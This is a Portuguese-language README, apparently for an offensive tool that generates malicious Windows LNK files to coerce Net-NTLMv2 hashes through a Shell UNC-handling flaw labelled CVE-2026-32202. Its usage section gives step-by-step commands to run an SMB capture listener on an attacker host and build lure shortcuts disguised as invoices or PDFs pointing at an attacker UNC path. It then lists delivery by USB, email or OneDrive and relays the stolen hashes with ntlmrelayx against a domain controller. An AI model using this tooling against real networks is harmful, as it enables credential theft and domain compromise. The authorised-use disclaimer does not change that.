
Gera arquivos LNK maliciosos para coagir hashes Net-NTLMv2 por meio do tratamento UNC do Windows Shell, com listener SMB personalizado e integração de relay para operações autorizadas de red team.
Aviso Legal
Esta ferramenta destina-se exclusivamente a red teaming autorizado e testes de penetração.
O uso não autorizado contra sistemas sem permissão explícita é ilegal.
Use por sua conta e risco. O autor não assume qualquer responsabilidade por uso indevido ou danos.
Descrição
Coerção de hash NTLMv2 via bypass incompleto da proteção do Windows Shell (CVE-2026-32202). Gera arquivos LNK especialmente elaborados que forçam autenticação SMB/UNC ao abrir ou visualizar no Explorer. Baixa interação, funciona em sistemas corrigidos onde a correção de abril de 2026 foi insuficiente. Usado ativamente em engajamentos.
Principais Recursos
O que o exploit faz
A ferramenta cria um .LNK elaborado que abusa do tratamento do Shell de caminhos UNC em Target + IconEnvironmentDataBlock / estruturas ExtraData. Quando a vítima navega pela pasta ou passa o mouse/visualiza o arquivo, o Windows Shell inicia uma conexão SMB para o UNC controlado pelo atacante, vazando o hash Net-NTLMv2 da máquina/usuário. Sem execução de código no alvo - coerção de credenciais para relay ou cracking.
Por que é útil
Testado em
Dependências
Instalar: pip install -r requirements.txt
Uso
# 1. Iniciar servidor de captura (host do atacante)
python smbcapture.py -i 0.0.0.0 -p 445 --output hashes.txt
# 2. Gerar LNK malicioso
python coercegen.py --unc \\attacker-ip\share\test --output "Invoice_Q2.lnk" --spoof "invoice.pdf"
# Opcional: modo estável ou bypass
python coercestable.py --unc \\attacker-ip\share\test --output "Report.lnk"
# 3. Entregar LNK (USB, compartilhamento, anexo de e-mail, OneDrive, etc.)
# 4. Aguardar hash no terminal + arquivo. Exemplo de relay:
ntlmrelayx.py -t smb://target-dc -c whoami --no-wmipriv
# ou relay LDAP para RBCD, HTTP para cert ADCS, etc.
Exploit
Limitações
Causa raiz (resumo)
Correção incompleta na sanitização de caminhos UNC do Windows Shell e no processamento de blocos ExtraData para resolução de ícone/alvo de LNK. O mecanismo de proteção destinado a bloquear spoofing de rede não autenticado ainda dispara autenticação NTLM durante a enumeração do namespace do Shell.